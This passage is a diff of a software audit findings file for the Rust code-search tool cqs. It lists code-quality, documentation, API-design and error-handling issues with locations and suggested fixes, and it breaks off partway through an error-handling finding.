-- **Suggested fix:** Move `parse_env_usize` / `_u64` / `_f32` to `src/lib.rs` (or new `src/env.rs`) as `pub fn`, add a `parse_env_duration_secs` variant for `Duration` cases (`local_timeout` etc.), and do a focused sweep replacing the open-coded sites. Drop the `limits.rs` private copies, re-export from there for convenience. One `pub fn` change + ~25 site edits.
+- **Location:** `src/serve/auth.rs:246-260` (and `check_request:305-318`)
+- **Description:** Both `strip_token_param` and `check_request` match the literal byte prefix `"token="`. A request with `?Token=<token>` (capital T) or `?%74oken=<token>` (percent-encoded `t`) is *not* recognised by `check_request` (so it 401s — fine) but it's *also* not stripped on the post-auth redirect path. The current tests (`p2_30_strip_token_param_capital_T_token_NOT_stripped_today`, `p2_30_strip_token_param_percent_encoded_key_NOT_stripped_today`) explicitly *pin* this gap with comments calling out "SEC-7 leakage: token survives in redirect URL". The bug is acknowledged in the test corpus but not fixed. Anyone naive enough to type `?Token=…` into the URL bar will leave the token visible there after the auth flow runs (and cookies handle subsequent requests). For an audit-reviewable security surface this is the wrong shape — the gap is filed *as a comment in a test that asserts the wrong behaviour*.
+- **Suggested fix:** Lowercase the parameter key once during the URI walk and percent-decode it before the comparison. Then invert the two pinned tests to assert the token is stripped. This is the fix the test comments already say is needed.
 
-#### `EmbeddingCache::open_with_runtime` accepts `CQS_CACHE_MAX_SIZE=0`; `QueryCache::open_with_runtime` rejects it — opposite behavior for sister env vars
+#### Three near-identical `ort_err` helpers across embedder / reranker / splade
 - **Difficulty:** easy
-- **Location:** `src/cache.rs:206-209` (Embedding, no zero filter), `src/cache.rs:1509-1513` (Query, `.filter(|&n: &u64| n > 0)`)
-- **Description:** Side-by-side in the same file, two sibling caches handle their `CQS_*_MAX_SIZE` env knob differently. `EmbeddingCache` does `env::var(...).ok().and_then(|s| s.parse().ok()).unwrap_or(10 * 1024^3)` — `CQS_CACHE_MAX_SIZE=0` parses fine to `0`, sets `max_size_bytes = 0`, and `evict()` then aggressively evicts everything to fit under 0 bytes. `QueryCache` adds `.filter(|&n: &u64| n > 0)` so `CQS_QUERY_CACHE_MAX_SIZE=0` falls back to the 100 MB default. Whichever you intended — uniform fallback, or "0 disables the cache" — picking only one accidentally is the wrong outcome. This is the exact class of inconsistency the proposed shared `parse_env_u64` helper above closes.
-- **Suggested fix:** Pick a semantic and document it. If "0 disables": uniformize both to accept 0, document, and have `evict()` short-circuit when `max_size_bytes == 0`. If "0 is invalid, use default": add `.filter(|&n: &u64| n > 0)` to the EmbeddingCache parse at `src/cache.rs:208`. Either way, drive the parse through one helper and write the test once.
+- **Location:** `src/embedder/provider.rs:14`, `src/reranker.rs:100`, `src/splade/mod.rs:27`
+- **Description:** Each module defines `fn ort_err(e: ort::Error) -> XxxError { XxxError::Inference(e.to_string()) }` (with minor signature differences — generic `<T>` vs concrete). The reranker's doc comment even cross-references `crate::embedder::ort_err` for rationale, signalling the duplication is known. P3.1 already deduped `panic_message` in three modules; this is the next instance of the same pattern. With `pub(crate)` visibility on the embedder helper and an `impl From<String>` shim per error enum (or a generic `ort_to_inference<E: From<String>>` helper), the three become one.
+- **Suggested fix:** Promote `embedder::ort_err` to a crate-private free function (or move it to a `crate::ort_helpers` module) and have reranker/splade reuse it via a per-enum `From<String>` impl on the `Inference`-shaped variant. Saves ~9 LOC and removes a "see other module for rationale" cross-reference.
 
-#### `cli/commands/resolve.rs::find_reference` and the inline lookup inside `resolve_reference_db` re-roll the same "find ref by name + nice error" twice
+#### Auth `--no-auth` warning at boot is silent for localhost binds
 - **Difficulty:** easy
-- **Location:** `src/cli/commands/resolve.rs:26-39` (`find_reference`), `src/cli/commands/resolve.rs:46-57` (inline `references.iter().find(|r| r.name == name)` with byte-identical error message)
-- **Description:** Both functions: (1) call `Config::load(root)`, (2) iterate `config.references`, (3) `.find(|r| r.name == name)`, (4) return `anyhow::anyhow!("Reference '{}' not found. Run 'cqs ref list' to see available references.", name)` on miss. The only difference is `find_reference` returns the full `ReferenceIndex` (loaded via `reference::load_references`), while `resolve_reference_db` only needs the `ReferenceConfig.path`. The error-message duplication is verbatim — change "Run 'cqs ref list'" to anything else and one call site silently lies. Three other call sites across `resolve_reference_store` / `resolve_reference_store_readonly` chain through `resolve_reference_db`, so the bug surfaces on any of them.
-- **Suggested fix:** Extract `find_reference_config(config: &Config, name: &str) -> Result<&ReferenceConfig>` returning the typed config row (no IO, just the find + message). `find_reference` then becomes `let cfg = find_reference_config(&config, name)?; reference::load_references(slice::from_ref(cfg)).into_iter().next().ok_or(...)`; `resolve_reference_db` uses the same helper to read `cfg.path`. One source of truth for the error string.
+- **Location:** `src/cli/commands/serve.rs:27-37`
+- **Description:** `cmd_serve` only prints the `WARN: --bind ... with --no-auth` banner when bind is *not* localhost. The localhost+`--no-auth` case is the most common operator footgun (a personal box where another user account or a container peer can reach `127.0.0.1`), and the existing structured warning at `serve/mod.rs:162-165` only fires from inside `run_server` (after the bind happens, mixed with the listening-banner stream). Two near-identical warnings exist for the same scenario; one is silent on the most common case.
+- **Suggested fix:** Drop the early CLI-side warning in favour of the unconditional `run_server` warning at `serve/mod.rs:162`, *or* widen the CLI predicate to fire on any `--no-auth` regardless of bind. Don't carry both.
+# Audit Findings — Documentation (v1.30.1, 2026-04-28)
 
-#### `slot::libc_exdev` hardcodes errno 18 with comment claiming `libc` would be "just for this constant" — but `libc` is already a workspace dep
-- **Difficulty:** easy
-- **Location:** `src/slot/mod.rs:640-647`
-- **Description:** Comment (lines 640-643): "We hardcode 18 (Linux) since `libc::EXDEV` would pull in a libc dep just for this constant. macOS also uses 18; Windows doesn't surface EXDEV the same way." `libc = "0.2"` is in `Cargo.toml` and already imported in `src/cli/watch.rs` (`extern "C" fn on_sigterm(_sig: libc::c_int)`). The hardcode is correct in practice (Linux + macOS both define EXDEV=18; FreeBSD too), but the *justification* is wrong, and a future maintainer reading the comment will assume libc isn't available. Worse, on the unlikely platform where EXDEV diverges (some BSD variants in theory), the hardcoded `18` silently mis-classifies the error and the EXDEV → copy+remove fallback in `move_file` skips. Self-documenting fix: use `libc::EXDEV` and delete the comment.
-- **Suggested fix:** Replace the `fn libc_exdev() -> i32 { 18 }` shim with `libc::EXDEV` directly at the call site in `src/slot/mod.rs:631`. `#[cfg(unix)]` already gates the EXDEV branch implicitly via `raw_os_error()` returning a Linux/macOS errno; the `libc` dep is unconditionally available on those targets through the existing watch.rs usage. Remove the misleading comment.
-
-
-## Documentation
-
-#### DOC-V1.30-1: PRIVACY.md and SECURITY.md falsely claim `~/.cache/cqs/query_log.jsonl` is opt-in
-- **Difficulty:** easy
-- **Location:** `PRIVACY.md:22`, `SECURITY.md:101`, vs `src/cli/batch/commands.rs:371-391` (`log_query`)
-- **Description:** **P1: Docs Lying.** Both docs state the per-user query log is "opt-in, written only when `CQS_TELEMETRY=1` or the file already exists." `log_query` in `src/cli/batch/commands.rs` is called unconditionally from `BatchCmd::Search/Gather/Onboard/Scout/Where/Task` dispatch arms (`commands.rs:418, 441, 477, 487, 491, 513`) and uses `OpenOptions::new().create(true).append(true)` — it creates the file on first batch query regardless of env var or prior file presence. Every `cqs chat` / `cqs batch` user is silently building a search-history file at `~/.cache/cqs/query_log.jsonl` despite the privacy/security docs promising opt-in behaviour. Search queries can contain code snippets, identifiers, internal hostnames.
-- **Suggested fix:** Either gate `log_query` on `std::env::var("CQS_TELEMETRY") == Ok("1")` plus existing-file check (matching the documented contract and the `cli/telemetry.rs::record` pattern), or rewrite both docs to state that the log is unconditional. The privacy contract is the more defensible direction — fix the code, keep the docs.
-
-#### DOC-V1.30-2: PRIVACY.md claims `query_cache.db` has a 7-day TTL — code only enforces a 100 MiB size cap
-- **Difficulty:** easy
-- **Location:** `PRIVACY.md:21` vs `src/cache.rs:1536-1606` (`QueryCache::evict`) and `src/cli/batch/mod.rs:1351-1376`
-- **Description:** **P1: Docs Lying.** Privacy doc says "recent query embeddings with a 7-day TTL." There is no time-based TTL anywhere in `QueryCache`. `evict()` looks at `CQS_QUERY_CACHE_MAX_SIZE` (100 MiB default) and trims oldest rows by `ts ASC` only when the disk size exceeds the cap. `prune_older_than(days)` exists but is only invoked by the user-typed `cqs cache prune <days>` command, never automatically. A user who runs `cqs` daily for months will retain every unique search query embedding indefinitely up to the size cap, not for "7 days."
-- **Suggested fix:** Replace the line in PRIVACY.md with: "recent query embeddings, evicted oldest-first when the DB exceeds `CQS_QUERY_CACHE_MAX_SIZE` (100 MiB default). Prune older entries with `cqs cache prune <DAYS>`."
-
-#### DOC-V1.30-3: CHANGELOG v1.30.0 names `CQS_LLM_ENDPOINT` for local LLM provider — actual env var is `CQS_LLM_API_BASE`
-- **Difficulty:** easy
-- **Location:** `CHANGELOG.md:19`
-- **Description:** v1.30.0 release entry says "`cqs index --llm-summaries` accepts a local OpenAI-compatible endpoint via `CQS_LLM_ENDPOINT`." `CQS_LLM_ENDPOINT` does not exist in the codebase. The actual env vars are `CQS_LLM_PROVIDER=local` plus `CQS_LLM_API_BASE=http://...` (`src/llm/mod.rs:227, 378-385`). README/SECURITY both document `CQS_LLM_API_BASE` correctly. A user copy-pasting the CHANGELOG instructions will get "CQS_LLM_PROVIDER=local requires CQS_LLM_API_BASE" at runtime.
-- **Suggested fix:** Rewrite the line as: "...accepts a local OpenAI-compatible endpoint via `CQS_LLM_PROVIDER=local` + `CQS_LLM_API_BASE=...`." Same fix mirrors how the README env-var table phrases it (`README.md:740-745`).
-
-#### DOC-V1.30-4: CONTRIBUTING.md "Adding a New CLI Command" still tells contributors to add a match arm in `dispatch.rs` — that hasn't been the procedure since #1097
-- **Difficulty:** easy
-- **Location:** `CONTRIBUTING.md:339-355` vs `src/cli/registry.rs:1-29` (header doc)
-- **Description:** **P1: Docs Lying.** v1.30.0 #1097/#1114 collapsed five exhaustive matches (`Commands::batch_support`, `variant_name`, dispatch Group A, dispatch Group B, batch classification) into one `for_each_command!` table in `src/cli/registry.rs`. registry.rs:8-21 says: "Adding a new command now means: declare the variant in `definitions.rs::Commands`, add one row to either `group_a` or `group_b` list below, implement the handler. A missing row is a compile error." The contributing checklist still says: "**Dispatch** — match arm in `src/cli/dispatch.rs`" with no mention of `registry.rs`. A new contributor following the checklist will edit dispatch.rs (which now generates from registry) and either fail to compile or paste an arm into the wrong file. Architecture Overview at line 154-158 also lists `dispatch.rs` but never mentions `registry.rs`.
-- **Suggested fix:** (1) Replace step 4 with: "**Registry row** — add a `(bind, wild, name, batch_support, body)` row to `group_a` or `group_b` in `src/cli/registry.rs`; the macro generates dispatch + variant_name + batch_support". (2) Add `registry.rs - for_each_command! table; single source of truth for dispatch + variant_name + batch_support` next to `dispatch.rs` in the Architecture Overview block.
-
-#### DOC-V1.30-5: README "Claude Code Integration" command list missing 5 user-facing commands (`ping`, `eval`, `model`, `serve`, `refresh`)
-- **Difficulty:** easy
-- **Location:** `README.md:467-525`
-- **Description:** The `<claude>` integration block tells agents to install this list as their CLAUDE.md command reference. `cqs --help` shows 53 top-level commands; the README list omits: `cqs ping` (daemon healthcheck), `cqs eval` (eval harness, v1.29.x first-class), `cqs model` (show/list/swap embedding model — referenced by `audit-mode.json` doc and CHANGELOG), `cqs serve` (flagship v1.29.0 web UI; DOC-V1.29-2 noted absence in usage section but it's also missing from the agent-facing list), `cqs refresh` / `cqs invalidate` (added v1.30.0 per CHANGELOG line 22). Agents whose CLAUDE.md is bootstrapped from this list won't know these commands exist.
-- **Suggested fix:** Append five lines mirroring the existing format, with a one-sentence summary each. `serve` should link to the auth-token launch banner.
-
-#### DOC-V1.30-6: README "Claude Code Integration" lists `cqs cache stats/prune/compact` — actual subcommands are `stats/clear/prune/compact`
-- **Difficulty:** easy
-- **Location:** `README.md:521`
-- **Description:** `cqs cache --help` shows four subcommands: `stats`, `clear`, `prune`, `compact`. README and CLAUDE-Code line says only `stats/prune/compact`. `clear` is the destructive "delete all cached embeddings (or only for a model fingerprint)" — useful and dangerous, should be in agent docs.
-- **Suggested fix:** Change `cqs cache stats/prune/compact` to `cqs cache stats/clear/prune/compact` and document `clear --model <fp>` semantics in the trailing sentence.
-
-#### DOC-V1.30-7: README claims "544-query dual-judge eval" in TL;DR — actual eval is 218 queries (109 test + 109 dev)
-- **Difficulty:** easy
-- **Location:** `README.md:5` (TL;DR) vs `README.md:649` (eval section)
-- **Description:** TL;DR headline boasts "**42.2% R@1 / 67.0% R@5 / 83.5% R@20 on a 544-query dual-judge eval against the cqs codebase itself**". The actual Retrieval Quality section twelve hundred lines later says "**Live codebase eval** — 218 queries (109 test + 109 dev)". 544 doesn't appear anywhere else in the codebase or eval scripts; per memory the v3.v2 fixture is 109/109. Per memory + CHANGELOG #1109 "v3.v2 fixture refreshed 2026-04-25", the test R@5 is now 63.3% (74.3% dev) — the 67.0% is also the canonical pre-refresh number, not current. The "544" is likely a hangover from an earlier fixture (v2 had ~272 each split = 544 total).
-- **Suggested fix:** Replace "544-query" with "218-query (109 test + 109 dev) v3.v2" and either pin the metrics to a specific commit ("on commit X") or refresh to the current 63.3% / 74.3% (test R@5 / dev R@5). Both numbers should match between TL;DR and the table.
-
-#### DOC-V1.30-8: README "54 languages" claim conflicts with Cargo.toml (lang-elm now in default features) and source code (52 lang variants)
-- **Difficulty:** easy
-- **Location:** `README.md:5`, `README.md:530-585` (Supported Languages list), `CONTRIBUTING.md:135,187` vs `src/language/mod.rs` (`define_languages!`) and `Cargo.toml:179` (`default = [..., "lang-elm", ...]`)
-- **Description:** README repeats "54 languages" three times (TL;DR, Supported Languages header, How It Works step 1). The Supported Languages list itself shows 53 bullet items and never mentions Elm, despite `lang-elm` being in Cargo.toml's default feature list and `Elm => "elm", feature = "lang-elm"` registered in `src/language/mod.rs`. `define_languages!` macro emits 52 language variants when grepped (count includes Markdown but excludes ASPX/Razor/Vue/Svelte/HTML which delegate to other grammars per existing readme prose). Mismatch is small but the README list literally omits Elm — search for "Elm" returns zero hits in README.md.
-- **Suggested fix:** Either (a) recount and replace "54" with the audited count (likely 53 or 52 depending on whether Markdown / multi-grammar dispatch counts) and add an Elm bullet to the alphabetical list, or (b) remove `lang-elm` from default if Elm support is not actually shipping. Plumb the count through `language/mod.rs` registry length so it can't drift again.
-
-#### DOC-V1.30-9: SECURITY.md "Read Access" table omits per-project embeddings cache (`<project>/.cqs/embeddings_cache.db`)
-- **Difficulty:** easy
-- **Location:** `SECURITY.md:65-82`
-- **Description:** The Read Access filesystem table lists only the legacy global cache `~/.cache/cqs/embeddings.db`. v1.30.0 (PR #1105) added a per-project cache at `<project>/.cqs/embeddings_cache.db` (`src/cache.rs:91-93::project_default_path`) that is now the primary cache; the global one is consulted on miss for back-compat (PRIVACY.md gets this right at lines 16-20). A security reviewer reading SECURITY.md will think there's only one cache file to consider.
-- **Suggested fix:** Add a row to both Read Access and Write Access tables: `<project>/.cqs/embeddings_cache.db` — Per-project embedding cache (#1105, primary; legacy global cache at `~/.cache/cqs/embeddings.db` is fallback) — `cqs index`, search.
-
-#### DOC-V1.30-10: `enumerate_files` doc comment claims "Respects .gitignore" — also layers `.cqsignore` when `no_ignore=false`
-- **Difficulty:** easy
-- **Location:** `src/lib.rs:542-547` doc comment vs body at `src/lib.rs:566-569`
-- **Description:** Public-API doc says: "Respects .gitignore, skips hidden files and files larger than `CQS_MAX_FILE_SIZE` bytes". The body adds `wb.add_custom_ignore_filename(".cqsignore")` when `no_ignore` is false (`lib.rs:567-569`). `.cqsignore` is the headline v1.29.0 feature for excluding files committed to git but never indexed; library consumers calling `cqs::enumerate_files` need to know the function honours it (or reconfigure if they don't want it). Body comment at line 560-565 explains the rationale but the function's outer doc comment doesn't surface it.
-- **Suggested fix:** Update the doc comment to: "Respects `.gitignore` and `.cqsignore` (additive on top of `.gitignore`, both disabled by `no_ignore=true`); skips hidden files and files larger than `CQS_MAX_FILE_SIZE` bytes (default 1 MiB — generated code can exceed this)."
-
-
-## API Design
-
-#### `cqs --json model swap <bad-preset>` emits plain-text error, not envelope JSON
-- **Difficulty:** easy
-- **Location:** `src/cli/commands/infra/model.rs:cmd_model_swap` (the `Unknown preset 'X'.` `anyhow::anyhow!` and the `No index at ...` `bail!`) and the parallel `cmd_model_show` `bail!` for missing-index.
-- **Description:** `cqs --json model swap nonexistent-preset` prints `Error: Unknown preset 'nonexistent-preset-zzz'. ...` to stderr and exits non-zero — no JSON envelope. Verified live. Compare to `cqs --json ref remove nonexistent-zzz` which emits `{"data":null,"error":{"code":"not_found","message":"..."}, "version":1}` via `json_envelope::emit_json_error`. Same `--json` global flag, two different error contracts. Agents driving model swaps from CI can't differentiate "bad preset" from "transient I/O failure" because the surface looks identical (stderr text + non-zero exit). `cmd_model_show`'s `No index at ...` `bail!` has the same shape problem on the read path. The v1.30.0 audit fixed this for `ref/project/telemetry`; `model` was missed.
-- **Suggested fix:** Wrap the `anyhow::anyhow!`/`bail!` sites in `cmd_model_swap` and `cmd_model_show` so that when `json: bool` is true they route through `json_envelope::emit_json_error` with codes `unknown_preset`, `no_index`, `already_on_target` (the no-op short-circuit), and `swap_failed`. Pattern is already established in `cmd_ref_remove` (`src/cli/commands/infra/reference.rs`).
-
-#### `cqs init`, `cqs index`, `cqs convert` lack `--json` despite being the headline mutation surface
-- **Difficulty:** medium
-- **Location:** `src/cli/commands/infra/init.rs:cmd_init`; `src/cli/commands/index/build.rs:cmd_index` (and `IndexArgs` in `src/cli/args.rs:567+` has no `json` field); `src/cli/commands/index/convert.rs` (no `json` flag).
-- **Description:** `cqs init`, `cqs index`, and `cqs convert` are the only path for an agent to bootstrap or refresh an index. None of the three accept `--json`. `cqs index --json` errors with `unexpected argument '--json'`; `cqs init --json` likewise. Every other long-running command (`cqs gc`, `cqs model swap`, `cqs index` peer commands) already supports `--json`. The result is that an automation pipeline that wraps `cqs init && cqs index --llm-summaries` can't capture timing/byte/chunk-count metrics structurally — it has to scrape colored stdout. Particularly painful for `cqs index --llm-summaries --improve-docs` which spends real money and has no machine-readable summary on completion. The CONTRIBUTING "Dry-Run vs Apply" comment in the code already lumps `index` and `convert` as "side-effect commands"; both should also be the `--json`-emitting commands.
-- **Suggested fix:** Add `#[arg(long)] pub json: bool` to `IndexArgs`, the new `InitArgs` (currently no args struct — need to introduce one), and `ConvertArgs`. Thread `cli.json || args.json` through `cmd_init` / `cmd_index` / `cmd_convert` and emit a final `{indexed_files, indexed_chunks, took_ms, model, summaries_added?, docs_improved?}` (or analog) envelope via `json_envelope::emit_json` after the work completes. Suppress the per-step progress lines when `json` is set (or route them to stderr — doctor already does this with "Colored human-readable check progress is routed to stderr in this mode").
-
-#### Global `--slot` is silently ignored by every `cqs slot` and `cqs cache` subcommand
-- **Difficulty:** easy
-- **Location:** `src/cli/definitions.rs` (`pub slot: Option<String>` declared with `#[arg(long, global = true)]`); `src/cli/commands/infra/slot.rs` (`SlotCommand::Create/Promote/Remove` take a positional `name` and never read `cli.slot`); `src/cli/commands/infra/cache_cmd.rs:resolve_cache_path` (no `cli.slot` reference, cache is project-scoped, not per-slot).
-- **Description:** `--slot <NAME>` is `global = true` on the top-level `Cli`, so it appears in every subcommand's `--help` (verified: `cqs slot create --help`, `cqs slot promote --help`, `cqs slot remove --help`, `cqs cache stats --help` all advertise `--slot <SLOT>`). For `slot create/promote/remove/active` and the entire `cache` subtree it's a no-op: `slot create foo --slot bar` creates `foo` and ignores `bar` (verified live), `cache stats --slot foo` opens the project-wide cache regardless. The help text actively lies about supported behaviour — agents reading `--help` will conclude they can scope cache ops to a slot. This is the worst kind of API drift: the flag works, parses, and is silently dropped.
-- **Suggested fix:** Move `--slot` off `global = true` and onto only the subcommands that actually consume it (every `Commands::*` that ends up calling `cqs::slot::resolve_slot_name` or threads slot into `CommandContext`). For `slot create/promote/remove/active` and `cache *`, keep `--slot` off the surface entirely. Alternative: enforce at dispatch time — `if cli.slot.is_some() && !subcommand_uses_slot { bail!("--slot has no effect on `cqs {subcommand}`") }` — louder than silent-drop, cheap to implement.
-
-#### `cqs refresh` has no `--json`; every other infra command does
-- **Difficulty:** easy
-- **Location:** `src/cli/definitions.rs:755-761` (`Commands::Refresh` — no JSON arg), and `src/cli/registry.rs` dispatch arm.
-- **Description:** `cqs refresh` (alias `invalidate`) is the user-facing surface for the daemon's cache-drop verb. It returns no JSON output — verified, `cqs --json refresh` prints plain text. Compare to `cqs ping --json`, `cqs gc --json`, `cqs cache compact --json`, `cqs telemetry --reset --json`, `cqs slot promote foo --json` — every other infra-mutation/healthcheck supports `--json`. An agent that just promoted a slot needs `refresh` followed by a query; without `--json` it can't confirm "cache invalidated, re-open succeeded" structurally. Was caught in v1.30.0 audit as missing CLI surface (added) but the new entry shipped without the standard JSON contract.
-- **Suggested fix:** Add `#[command(flatten)] output: TextJsonArgs` to `Commands::Refresh`, thread into the dispatch arm, and emit `{"refreshed": true, "daemon_running": bool, "caches_invalidated": [...]}` when the flag is set. The daemon-side `dispatch_refresh` (`src/cli/batch/handlers/refresh.rs` or wherever it lives) likely already returns a JSON object — surface it on the CLI path too.
-
-#### List-shape JSON envelopes are inconsistent across `*list` commands
-- **Difficulty:** easy
-- **Location:** `src/cli/commands/infra/reference.rs:cmd_ref_list` (raw array); `src/cli/commands/infra/model.rs:cmd_model_list` (raw array); `src/cli/commands/infra/project.rs:124-140` (object `{projects: [...]}`); `src/cli/commands/infra/slot.rs:slot_list` (object `{active, slots: [...]}`); `src/cli/commands/io/notes.rs:cmd_notes_list` (object `{notes: [...]}`); `src/cli/commands/search/query.rs` (object `{query, results, total}`).
-- **Description:** Verified live: `cqs ref list --json` emits `{"data":[{...},{...}], "error":null, "version":1}` (raw array under `data`). `cqs project list --json` emits `{"data":{"projects":[...]}, ...}` (object under `data`). `cqs slot list --json` emits `{"data":{"active":"default","slots":[...]}, ...}`. `cqs model list --json` emits `{"data":[{...}], ...}` (raw array). Five `*list --json` surfaces, three different shape conventions. Agents writing a generic `data.{slots,projects,refs,models,notes}` accessor have to special-case ref and model. The right convention is the wrapping-object form — it leaves room for sibling fields like the slot-list `active` summary or the search `total` count without breaking the schema.
-- **Suggested fix:** Standardize on `{"data": {"<plural-name>": [...]}}` for every list-emitting subcommand. Concretely: change `cmd_ref_list` to emit `{"references": [...]}` and `cmd_model_list` to emit `{"models": [...], "current": "<name>"}` (the latter folds the `current: bool` per-row flag into a top-level `current` field — cleaner). Hard rename, no-external-users; ship it as a single PR that touches both call sites + their tests.
-
-#### `cqs cache stats` JSON mixes byte and megabyte units; `cache compact` uses bytes only
-- **Difficulty:** easy
-- **Location:** `src/cli/commands/infra/cache_cmd.rs:cache_stats` (emits both `total_size_bytes` AND `total_size_mb`) vs `cache_compact` (emits `reclaimed_bytes`, `size_after_bytes`, `size_before_bytes`).
-- **Description:** Verified: `cqs cache stats --json` emits `total_size_bytes: 1662976, total_size_mb: 1.5859375` — same number, two units. `cqs cache compact --json` emits `reclaimed_bytes / size_after_bytes / size_before_bytes` — bytes only. An agent computing "free space saved" has to special-case which fields are present per command. Mixed-unit fields are also fragile: a future SI-vs-binary correction (1024 vs 1000) silently shifts `*_mb` while `*_bytes` stays correct, producing two-source-of-truth bugs.
-- **Suggested fix:** Drop `total_size_mb` from `cache_stats` JSON (keep it in the human text path where the caller wants a digestible number). Bytes are the canonical unit across the rest of cqs (`size_*_bytes` already in `compact`, `chunks` are counts not sizes). For human stdout, format-on-display.
-
-#### `pub use nl::*` leaks dead `generate_nl_with_call_context` wrapper into the lib API
-- **Difficulty:** easy
-- **Location:** `src/lib.rs:165` (`pub use nl::*`); `src/nl/mod.rs:43-59` (`generate_nl_with_call_context` — five-arg wrapper around the seven-arg `_and_summary` variant).
-- **Description:** `generate_nl_with_call_context` exists only as a thin wrapper that hard-codes `summary = None, hyde = None` and calls `generate_nl_with_call_context_and_summary`. Production code has zero callers — verified with `grep -rn 'generate_nl_with_call_context\b' src/ | grep -v '/nl/mod.rs:'` returns empty. Only the tests in `src/nl/mod.rs` use it. It's `pub` and re-exported via `pub use nl::*`, so it's part of the lib's public API surface. Not just dead code — it's dead public API, which is worse because removing it later is a "breaking" change in any consumer that picked it up. Same anti-pattern likely lurks under the other ten `pub use foo::*` glob re-exports in `src/lib.rs`.
-- **Suggested fix:** Drop `generate_nl_with_call_context` outright (only the test sites need to be updated to call `_and_summary` with `None, None`). Then audit all eleven `pub use foo::*` lines in `src/lib.rs` (`diff`, `gather`, `impact`, `nl`, `onboard`, `project`, `related`, `scout`, `search`, `task`, `where_to_add`) — replace each with explicit `pub use foo::{...}` lists naming the items the lib actually wants to publish. Glob re-exports are a footgun for surface control: every new `pub fn` in any of those modules joins the public API automatically.
-
-#### `cqs gather --expand <N>` and `cqs --expand-parent` collide on a high-traffic flag name
-- **Difficulty:** easy
-- **Location:** top-level `src/cli/definitions.rs:Cli::expand_parent` (flag `--expand-parent`, parent-context expansion, `bool`); `src/cli/args.rs:GatherArgs::expand` (flag `--expand`, call-graph BFS depth, `usize`); the v1.30.0 fix renamed `SearchArgs::expand` to `expand_parent` with `--expand` as a visible alias for back-compat.
-- **Description:** `cqs gather foo --expand 3` (graph depth) and `cqs foo --expand-parent` (parent-context `bool`) both accept the substring `--expand`. The v1.30.0 fix made `SearchArgs::expand` an alias for `expand_parent`, but `GatherArgs::expand` is still a distinct usize-typed flag. `cqs --expand 2 gather foo` parses `--expand 2` against the *top-level* `Cli` first — and there's no top-level `--expand`, so it errors, but the error doesn't say "did you mean `--expand-parent` (top-level) or did you mean to pass `--expand 2` after `gather`?" The dual semantic (bool parent-context vs usize call-graph depth) under similar flag names is the original API-V1.22-3 footgun that motivated the rename — it's only half-fixed.
-- **Suggested fix:** Rename `GatherArgs::expand` to `--graph-depth` (or `--depth` to match `onboard`/`impact`/`test-map` which all already use `--depth` for the same call-graph concept post-v1.30.0). That eliminates the `--expand` collision entirely and aligns the four call-graph-depth-taking commands under one flag name. Ship as hard rename — no external users.
-
-#### `cqs eval` `--save` accepts a path with no `.json` validation; output JSON is hard-coded
-- **Difficulty:** easy
-- **Location:** `src/cli/commands/eval/mod.rs:EvalCmdArgs::save` (`Option<PathBuf>`).
-- **Description:** `cqs eval queries.json --save report` writes a JSON report to a file literally named `report` (no extension). The flag is `Option<PathBuf>` with no validation, no extension default, no warning. `cqs eval` is the eval harness — a sloppy filename in a release-comparison workflow turns into "did I overwrite my baseline?" guessing. Compare `cqs eval --baseline report` which requires the path exist, contrasted with `--save` which just overwrites. Asymmetric input/output validation on a command meant for release-gate comparisons.
-- **Suggested fix:** When `--save <path>` lacks an extension, append `.json` automatically (with a one-line stderr note). When it has the wrong extension (`.txt`, `.yaml`), error out — eval reports are JSON-only. Mirrors the validation `cqs train-data --output <path>` should also have but doesn't.
-
-Summary: 0 findings carried forward (all 10 archived findings were fixed in v1.30.0 — verified via direct source reads of `src/cli/commands/infra/{project,reference,telemetry_cmd,model}.rs`, `src/cli/args.rs:NotesListArgs`, `src/cli/batch/handlers/misc.rs`, `src/cli/dispatch.rs:try_daemon_query`, `src/cli/definitions.rs:Refresh`, `src/cli/commands/eval/mod.rs:EvalCmdArgs::limit`); 9 new findings, 10 archived findings dropped as fixed.
-
-
-## Error Handling
-
-Findings target code paths added in v1.29.x → v1.30.0 (cache+slots #1105, local-LLM provider #1101, serve auth #1118, command registry #1114, non-blocking HNSW #1113, embedder Phase A #1120). Items already triaged in `docs/audit-triage-v1.30.0.md` (EH-V1.29-1..10) are explicitly skipped.
-
-#### `LocalProvider::submit_via_chat_completions` silently loses every batch result on Mutex poisoning
-- **Difficulty:** easy
-- **Location:** `src/llm/local.rs:155, 196, 271-279, 305, 545`
-- **Description:** `LocalProvider` (PR #1101) drives the local LLM batch via per-thread workers that share a `Mutex<HashMap<String, String>> results` accumulator. Every single store-side and finalization step uses `.lock().unwrap()` or `if let Ok(mut g) = lock.lock()` and silently drops the poison case. Specifically:
-  - Line 196: `if let Ok(mut map) = results_ref.lock() { map.insert(...) }` — if a *prior* worker's panic poisoned the lock, every subsequent successful item is silently dropped (`Ok(Ok(Some(text)))` branch becomes a no-op).
-  - Line 271-272, 278-279: `let ok = *succeeded.lock().unwrap();` etc. — first poisoned lock crashes the batch.
-  - **Worst case at line 305**: `let results_map = results.into_inner().unwrap_or_default();` — `Mutex::into_inner` returns `LockResult`. On poison, `unwrap_or_default()` quietly substitutes an **empty `HashMap`**, then writes that into the stash. `submit_via_chat_completions` then logs `"local batch complete"` with the real (truthful) succeeded/failed counts and returns the batch_id. The user later calls `fetch_batch_results(batch_id)` and gets `{}` — *all results lost* — with no error, no warning, and no signal that the count `succeeded` ≠ map size. Combined with the `Ok("ended")` from `check_batch_status`, the doc/HyDE pipelines treat this as a successful empty batch (every chunk's "summary failed silently") and persist nothing.
-- **Suggested fix:** (1) Replace `Mutex::into_inner().unwrap_or_default()` at line 305 with `match results.into_inner() { Ok(m) => m, Err(p) => { tracing::error!(succeeded = ok, "results mutex poisoned during batch — recovering inner state"); p.into_inner() } }` so the partially-populated map is preserved. (2) Add a post-finalize invariant check: `if results_map.len() != ok { return Err(LlmError::Internal(format!("batch accounting drift: ok={ok} map_len={}", results_map.len()))); }` so accounting drift surfaces instead of silently shipping a short stash. (3) Audit-mode rule: every `*foo.lock().unwrap()` in worker hot paths gets either `expect("…")` with a meaningful message or explicit `into_inner()` recovery — `unwrap()` was forbidden in this codebase per CLAUDE.md.
-
-#### `dispatch::try_daemon_query` warns user about daemon protocol error then silently re-runs the same command in CLI
-- **Difficulty:** easy
-- **Location:** `src/cli/dispatch.rs:445-462, 199-204`
